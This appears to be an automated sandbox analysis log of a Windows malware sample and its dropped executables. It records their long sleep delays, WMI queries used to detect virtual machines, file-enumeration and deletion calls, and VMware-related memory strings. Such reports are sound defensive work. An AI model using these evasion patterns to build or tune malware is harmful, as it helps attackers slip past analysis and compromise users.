Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599748s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 1120	Thread sleep count: 4100 > 30
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599593s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599475s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599359s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -88365s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599192s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598829s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598466s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598275s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598122s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597959s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597755s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597609s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597491s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597372s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597219s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597090s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596969s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596831s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596712s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596566s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596440s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596323s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596204s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596070s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -595880s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -595695s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -595055s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594851s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594684s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594568s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594447s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594326s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594205s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594044s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593923s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593802s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593666s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -87631s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593555s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593395s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593270s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593136s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593024s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592894s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592725s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592572s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592428s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591935s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591600s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591422s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591314s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591188s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591072s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590942s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590798s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590645s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590517s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590400s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590274s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590129s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589991s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589830s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589589s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589386s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589203s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589102s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588969s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588832s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588576s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588213s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -96076s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587769s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587619s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587501s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587354s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587144s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586881s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586638s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586470s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586314s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586105s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -585905s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -585639s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -585310s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584895s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584640s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584477s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584286s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584155s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6084	Thread sleep time: -16340000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6304	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe TID: 1248	Thread sleep count: 58 > 30
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe TID: 1248	Thread sleep time: -116000s >= -30000s
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 5876	Thread sleep time: -37000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe TID: 3180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3636	Thread sleep count: 170 > 30
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe TID: 4456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2448	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_004062EB FindFirstFileW,FindClose,	0_2_004062EB
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CB1
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00614005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00614005
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061C2FF
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_0061494A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD14 FindFirstFileW,FindClose,	19_2_0061CD14
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_0061CD9F
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F5D8
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F735
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061FA36
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00613CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00613CE2
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC38B4 FindFirstFileExW,	24_2_00CC38B4
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007638B4 FindFirstFileExW,	27_2_007638B4
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004415EE FindFirstFileExW,	31_2_004415EE
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B31855 FindFirstFileExW,	31_2_02B31855

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005C5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

19_2_005C5D13

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Thread delayed: delay time: 60000
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 90918
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599876
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599748
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599593
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599475
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599359
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 88365
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599192
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598829
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598466
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598275
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598122
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597959
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597755
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597609
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597491
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597372
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597219
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597090
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596831
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596712
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596566
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596440
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596323
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596204
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596070
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595880
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595695
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595055
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594851
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594684
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594568
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594447
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594326
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594205
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594044
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593923
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593802
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593666
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 87631
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593555
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593395
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593270
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593136
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593024
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592894
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592725
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592572
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592428
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591935
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591600
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591422
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591188
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591072
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590942
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590798
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590645
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590517
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590400
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590274
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590129
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589991
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589830
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589589
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589386
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589203
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589102
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588832
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588576
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588213
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 96076
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587769
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587619
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587501
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587354
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587144
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586881
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586638
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586470
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586105
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585905
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585639
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585310
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584895
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584640
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584286
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584155
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Thread delayed: delay time: 60000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Thread delayed: delay time: 37000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950	Jump to behavior

Source: Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Avmtoolsd.dll
Source: 3546345.exe.11.dr	Binary or memory string: MPGamesUnknown %dTwitch StudioFacebookToolbarMessengersrcOEMLenovoServiceBridgeThinkBuzanFree_PDF_SolutionsVMwarePunkBusterNoxSony CorporationRAV Endpoint Protection
Source: kitty.exe, 00000018.00000002.3280704140.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: IIZS2TRqf69aZbLAX3cf3edn.exe.28.dr	Binary or memory string: vmware
